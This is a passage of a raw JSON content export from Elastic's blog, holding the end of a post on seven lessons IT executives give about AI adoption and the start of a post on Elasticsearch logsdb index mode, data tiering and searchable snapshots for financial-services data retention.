0.6em;'\u003e\u003csup\u003e1\u003c/sup\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e use AI. And 60% of companies with more than 10,000 employees use AI. As for industries, the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/customers/jaguar-land-rover\"\u003e\u003cspan style='font-size: 12pt;'\u003emanufacturing\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/customers/lgcns\"\u003e\u003cspan style='font-size: 12pt;'\u003einformation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and — perhaps surprisingly — \u003c/span\u003e\u003ca href=\"https://www.elastic.co/customers/nhs\"\u003e\u003cspan style='font-size: 12pt;'\u003ehealthcare\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e industries are the leaders in AI adoption, while finance, insurance, and real estate have lower adoption rates.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith this widespread AI adoption, the reality is that not all projects are successful. In fact, 70% of CIOs\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003csup\u003e3\u003c/sup\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e reported a 90% failure rate for their custom-built AI applications. But, it’s not all bad news! The Boston Consulting Group found that the companies that have adopted AI early claim 1.5x higher revenue growth than other companies. In addition, 74% of enterprises\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003csup\u003e4\u003c/sup\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e using generative AI (GenAI) are seeing a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/maximize-roi-generative-ai-strategy\"\u003e\u003cspan style='font-size: 12pt;'\u003ereturn on investment\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Not all projects will be successful — and the ones that aren’t, you can learn from. The successful ones will help you stay competitive, bolster your revenue, and advance your AI maturity.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo help you on your AI adoption journey, we talked to three IT CxOs who are early adopters of AI to gain insight into their own journeys. We talked about where they’ve faced challenges, how they’ve harnessed opportunities, any best practices they’ve uncovered, and what AI endeavors have been successful.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What IT leaders have learned on their journey to AI adoption","_metadata":{"uid":"csec658482dd62fb90"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"1. Start with the problem","_metadata":{"uid":"csde434ecc9c869e74"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe best way to incorporate \u003c/span\u003e\u003ca href=\"https://www.elastic.co/generative-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eAI capabilities\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e into your organization is to start with a high-value problem you’re trying to solve. Rick Rioboli, EVP and CTO at Comcast Connectivity and Platform says, “Forget about AI, what is your biggest problem?” Focus on problems that, when solved, will have a dramatic impact on business. There are a variety of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/15-generative-ai-use-cases-enterprise\"\u003e\u003cspan style='font-size: 12pt;'\u003egenerative AI use cases\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e that organizations are already exploring that you could take inspiration from. Once you’ve identified your problem, start thinking about \u003c/span\u003e\u003ca href=\"https://www.elastic.co/lp/whats-possible-with-genai\"\u003e\u003cspan style='font-size: 12pt;'\u003ewhat data you’ll need to feed your AI model\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to address this problem.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs6f77fb3f8cbe49d5"}}},{"image":{"image":{"uid":"blt884b38eb0cfee62a","_version":1,"title":"blog-7-lessons-AI-journey.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-18T18:12:23.462Z","updated_at":"2025-02-18T18:12:23.462Z","content_type":"image/png","file_size":"81321","filename":"blog-7-lessons-AI-journey.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T18:32:56.859Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt884b38eb0cfee62a/67b4cd879e98d9a675bea05e/blog-7-lessons-AI-journey.png"},"_metadata":{"uid":"cs5d52ffded949511c"},"caption_l10n":"","alt_text_l10n":"7 lessons from IT leaders on their AI adoption journeys from Elastic. 1. Start with the problem. 2. Embrace experimentation. 3. Use the right data. 4. Quantify impact. 5. Avoid technical debt. 6. Use AI to predict and decide. 7. Implement guardrails","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"2. Embrace experimentation ","_metadata":{"uid":"cs4a4600f8514b3c87"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCynthia Stoddard, SVP and CIO at Adobe, encourages her employees to get creative. Stoddard says, “We’ve created an innovation hub that allows employees to understand what tools and Adobe products they can use to experiment with and solve real business problems.” This not only empowers employees to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/demo-gallery/ai-playground\"\u003e\u003cspan style='font-size: 12pt;'\u003etry new technology\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and create new solutions but also aids in the cultural transformation that comes with such a dramatic organizational change.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"3. Use the right data","_metadata":{"uid":"cs4b97eeef4d148fa7"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAnd make sure it’s quality data. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/generative-ai#what-are-popular-generative-ai-models\"\u003e\u003cspan style='font-size: 12pt;'\u003eGenerative AI models\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e are trained on massive amounts of data from the public internet, but they don’t have \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003ecurrent\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e data and wouldn’t have been trained on \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eyour\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e data. To get the most value out of AI, you need to be able to pass your proprietary data to the generative AI model, which is done through \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/retrieval-augmented-generation\"\u003e\u003cspan style='font-size: 12pt;'\u003eretrieval augmented generation (RAG)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. On top of having the right data, you need to make sure that it’s quality data and will give you relevant, accurate answers. Poor quality, inaccurate data will provide misleading results. Matt Minetola, CIO at Elastic, says, “Having a solid data strategy is essential. Without unified and accessible data, even the most advanced generative AI initiatives will struggle to deliver real value.”\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs44f2e2771187f8ba"}}},{"banner":{"reference":[{"uid":"blt48ad60890a06be7c","_content_type_uid":"banner"}],"_metadata":{"uid":"csfc5e5650a1a9b91b"}}},{"title_text":{"title_text":[{"title_l10n":"4. Quantify impact","_metadata":{"uid":"csb4063265c9cfc6bd"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce you identify your ideal outcome and confirm you have the right data, you need to continuously quantify what success looks like — from your MVP to your ideal solution. Whether that’s an increase in your net promoter score (NPS) to signify an improvement in customer experience or a decrease in the mean time to respond to show efficiency gains, make sure you can quantifiably show that the initiative was successful. Stoddard says by keeping an eye on performance, you’re able to determine if projects need to be tuned or, in some cases, dropped because you’re not getting the results you were expecting. And while monitoring business impact, you should also be monitoring the health and performance of your AI systems. This includes user satisfaction with the experience and accuracy of the outputs.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"5. Avoid AI sprawl and technical debt","_metadata":{"uid":"cs210759299b760b91"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOrganizations may be tempted to use different point solutions for different problems to try to get applications stood up quickly. Minetola warns that “the businesses who solved in pockets are starting to see the long-term cost. If they’ve done five to six different solutions with five to six different vendors and have to glue that together, the cost of that will be huge.” The technical debt —\u0026nbsp;the implied cost of the future work required to revise a project because speed was valued over long-term usability — and the data silos and compliance mess will make future AI endeavors a challenge. Stoddard says that all AI initiatives go through an architecture review to ensure they will fit into existing infrastructure.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"6. Use AI to predict and decide","_metadata":{"uid":"cscf712a048a550d68"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAI is an incredible tool when it’s used in employee- and customer-facing products. It’s also a powerful tool when used to make predictions and business decisions. “We look at using AI in our profitability and precision in how products are going to be used. We try to predict if we will get the usability out of our products that we thought we would,” Stoddard says. On \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-turn-data-into-actionable-insights\"\u003e\u003cspan style='font-size: 12pt;'\u003eusing data and AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to make business decisions, Minetola adds, “You can think of this as the multiplier effect that can truly take your organization to the next level by making every decision count.” When each decision is backed by (accurate and contextual) data, you can ensure it’s the most optimal one.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"7. Implement guardrails","_metadata":{"uid":"cs65f341042e0f900d"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGovernance and risk management are essential parts of your AI journey and must be prioritized. Stoddard says for AI at Adobe, the team relies on governance and examination of potential risks to “make sure it's safe, we’re using the right data, and we’re doing the right things for our customers.” Compliance is only going to become a bigger issue across markets as more laws around AI technologies are put in place. “You’re going to have multiple compliance issues if you don’t understand how the \u003c/span\u003e\u003ca href=\"https://partners.wsj.com/elastic/the-power-of-search-ai/moving-from-ideation-to-implementation-with-ai/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003edata for your AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e was generated,” adds Minetola.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Future-proof your AI adoption strategy","_metadata":{"uid":"cs2b3053271add5ce1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen it comes to scaling your strategy and making it work in the long-term, ensure that you’re not operating in silos. AI shouldn’t be thought of as individual solutions but an interconnected ecosystem that you’ll be able to grow as your use cases expand. Your data is your most valuable commodity. Avoiding silos and having the ability to access data no matter the environment will help as you scale and need to comply with new laws and regulations.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe AI adoption journey is not a race; it’s a marathon. Start with a strong data foundation and a solid use case to expand from there. If you haven’t started with AI yet, you haven’t missed the boat! There’s still time to future-proof your organization and stay competitive. You have an excellent opportunity to create an AI program that is scalable and transparent and that works for your needs. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/virtual-events/future-proof-your-business-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eCheck out this webinar in partnership with Fast Company\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for additional insights from these CxOs to help you along your AI adoption journey.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"","_metadata":{"uid":"cs73e870b5337d08df"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e1 \u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003eMIT Sloan, \u003c/span\u003e\u003ca href=\"https://mitsloan.mit.edu/ideas-made-to-matter/who-what-and-where-ai-adoption-america\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eThe who, what, and where of AI adoption in America\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e, 2024.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e2\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;Statistica, \u003c/span\u003e\u003ca href=\"https://www.statista.com/statistics/1545783/ai-adoption-among-organizations-worldwide/\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eAdoption of artificial intelligence among organizations worldwide from 2017 to 2024\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e, 2024.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e3\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u0026nbsp;IDC, \u003c/span\u003e\u003ca href=\"https://www.idc.com/getdoc.jsp?containerId=US52703024\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eIDC Executive CIO QuickPoll Series: Operationalizing AI\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e, 2024.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003csup\u003e4\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 10pt;\"\u003e Google, \u003c/span\u003e\u003ca href=\"https://cloud.google.com/transform/survey-generating-value-from-generative-ai-roi-study\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eGlobal survey: How leaders are generating value from generative AI\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e, 2024.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1f6361ed83b576ef"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csdeef83021f77c456"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse49202453e6306c2"}}}],"publish_date":"2025-02-18","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","title":"Natural Language Processing (NLP)","label_l10n":"Natural Language Processing (NLP)","keyword":"natural-language-processing","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt97696fc6e9921c30","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:43:16.119Z","updated_at":"2023-11-06T20:43:16.119Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:23:24.704Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt9085022a5c6c87e9","ACL":{},"created_at":"2023-11-06T20:41:57.778Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"large-language-models","label_l10n":"Large language models","tags":[],"title":"Large language models","updated_at":"2023-11-06T20:42:13.486Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:28.432Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt71ff43ee43da8e0e","_version":1,"title":"173911 - Blog header image - Elastic_V1.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-18T18:06:57.004Z","updated_at":"2025-02-18T18:06:57.004Z","content_type":"image/jpeg","file_size":"157564","filename":"173911_-_Blog_header_image_-_Elastic_V1.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T18:32:56.847Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt71ff43ee43da8e0e/67b4cc415dcb77d788dcd4c9/173911_-_Blog_header_image_-_Elastic_V1.jpg"},"title":"7 lessons from IT leaders on their AI adoption journeys","title_l10n":"7 lessons from IT leaders on their AI adoption journeys","updated_at":"2025-02-18T18:32:51.428Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/ai-adoption-lessons-from-it-leaders","publish_details":{"time":"2025-02-18T18:32:56.516Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt408e66147d1079fb","_version":5,"locale":"en-us","ACL":{},"abstract_l10n":"Discover how Elastic Cloud and Elasticsearch logsdb index mode help financial institutions optimize data retention, ensure compliance with regulations, and reduce costs with efficient storage solutions.","author":["bltce462b8f0bc7868a"],"category":["bltb79594af7c5b4199"],"created_at":"2025-02-14T17:21:40.679Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa371f9cbefd2425b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs the amount of data being created and stored worldwide is increasing rapidly, financial institutions are tasked more with managing vast volumes of data while ensuring compliance with stringent regulatory requirements. These regulations, such as GDPR, MiFID II, PCI DSS, and SOX, can vary significantly depending on jurisdiction and often require the retention of data for extended periods — sometimes ranging from \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ethree to ten years\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. The data that falls under these regulations is vast, covering transaction data, communication data, audit logs, and more. And this is not just a legal obligation but also a critical component of maintaining high customer service standards and operational integrity.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs every attorney in the securities industry knows, the first order of business in any case is to make a motion to preserve and retain all forms of communications. That could be text messages, emails, or messages that were transmitted through any kind of electronic communication like social media apps or messaging apps. As it turns out, managing to retain and produce this data across electronic communications can be a challenging task for financial services companies. This \u003c/span\u003e\u003ca href=\"https://www.reuters.com/legal/transactional/save-your-messages-secs-focus-document-retention-continues-into-2024-2024-02-20/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eReuters article\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e outlines the complexities of data management and highlights the cost associated for being in violation of SEC recordkeeping requirements.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud offers robust solutions to help financial services companies meet their compliance requirements efficiently and cost-effectively.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Lowering data storage costs with Elasticsearch logsdb index mode","_metadata":{"uid":"cscfae3a2159a77b12"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-8-17-0#elasticsearch-logsdb-index-mode\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch logsdb index mode\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e can significantly reduce data storage costs by efficiently storing and searching essential log data. Logsdb index mode can cut data storage costs by up to 65%, making it a strategic choice for financial services companies looking to optimize their data management budgets. By using logsdb index mode, financial services companies can maintain comprehensive log data for compliance and auditing purposes without running up excessive costs. This capability ensures that critical log data remains accessible and manageable, supporting long-term data retention strategies while adhering to budget constraints.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Optimized and cost-effective data tiers","_metadata":{"uid":"cs2261fa87c16493d5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUnlike other data platform leaders, Elastic's data tiering approach optimizes data management by categorizing data into storage tiers based on access frequency and cost:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eHot tier:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Designed for frequently accessed, critical data that you need to analyze quickly. Data in the hot tier is typically retained for one to seven days for immediate analysis.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCold tier:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Suitable for infrequently accessed, read-only data and uses low-cost object storage like AWS S3. It balances cost and performance through caching and partial restores.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eFrozen tier:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Ideal for long-term retention, storing data entirely in object storage for up to two years or longer. Elasticsearch's unique \u003c/span\u003e\u003ca href=\"https://www.elastic.co/elasticsearch/elasticsearch-searchable-snapshots\"\u003e\u003cspan style='font-size: 12pt;'\u003esearchable snapshots\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e capability enables direct searches without any rehydration and maintains efficient search performance. Most Elastic customers adopt a hot-frozen architecture, where data is stored for one to three days in the hot tier and the rest are in the frozen tier. This approach significantly reduces costs while retaining high levels of search performance.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic's cold and frozen tiers perform with search speeds comparable to competitors' hot tiers, often eliminating the need for a warm tier. This approach allows storage of up to 20 times more read-only data at the same cost — reducing total ownership costs and enhancing data availability, compliance, and business outcomes.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9074252c00b47449"}}},{"image":{"image":{"uid":"blt61a4862da1fc1924","_version":1,"title":"image1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-14T17:22:54.572Z","updated_at":"2025-02-14T17:22:54.572Z","content_type":"image/png","file_size":"433561","filename":"image1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-14T17:24:16.419Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt61a4862da1fc1924/67af7bee2cc2e385575e0d8f/image1.png"},"_metadata":{"uid":"cs989ebd2f95b217e5"},"caption_l10n":"","alt_text_l10n":"elastic searchable snapshots","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Adding value through searchable snapshots","_metadata":{"uid":"cs06673d4963033db2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSearchable snapshots allow you to retain data in low-cost object storage that’s managed through Elastic and to search without rehydration — avoiding delays, transit costs, and potential data residency issues. This is particularly beneficial for data in the frozen tier, where the cost of storage is minimized. However, the data remains accessible for analytical and compliance purposes.\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSnapshot creation:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Data from the Elastic cluster is periodically captured and stored as snapshots in the chosen object storage repository. These snapshots are point-in-time copies of indices.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSearchability:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Unlike traditional snapshots that require rehydration before querying, searchable snapshots enable direct querying of data stored in object storage.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCost efficiency:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e By storing data in object storage through Elastic, financial services companies benefit from the lower costs associated with these services compared to traditional block storage.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eFast performance via cache:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Elastic uses cache for frequently used searches, which speeds up queries. If a search requires data that is not in the cache, Elasticsearch fetches the missing data from the snapshot repository. Searches that require these fetches are slower, but the fetched data is stored in the cache so that similar searches can be served more quickly in the future. Elasticsearch will evict infrequently used data from the cache to free up space. The cache is cleared when a node is restarted.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis approach significantly reduces the total cost of ownership, making it an ideal choice for financial services companies focused on cost containment.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Using a snapshot repository to offload longer-term data","_metadata":{"uid":"cse6c3272c4198b017"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic integrates with multiple object storage solutions, allowing financial institutions to offload data to a repository of their choice, such as AWS, Azure Blob Storage, or Google Cloud Platform. \u003c/span\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003eElasticsearch also offers the option to store data locally for use cases that require regulation or data sovereignty.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHere’s how it works:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSet up repository:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e In Elastic Cloud, configure a snapshot repository using your preferred cloud storage service. This involves setting up the necessary credentials and permissions to allow Elastic to store and retrieve data from your chosen storage solution.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCreate searchable snapshots:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Once the repository is configured, create searchable snapshots of your indices. These snapshots are stored in the configured repository and can be queried directly without needing to restore them to the Elastic cluster.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eOptimize costs and flexibility:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e By using your own storage accounts, you maintain control over your data and can optimize costs based on specific performance needs and retention requirements. Searchable snapshots provide a cost-effective way to retain long-term data while ensuring it remains accessible for analytical and compliance purposes.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003ca 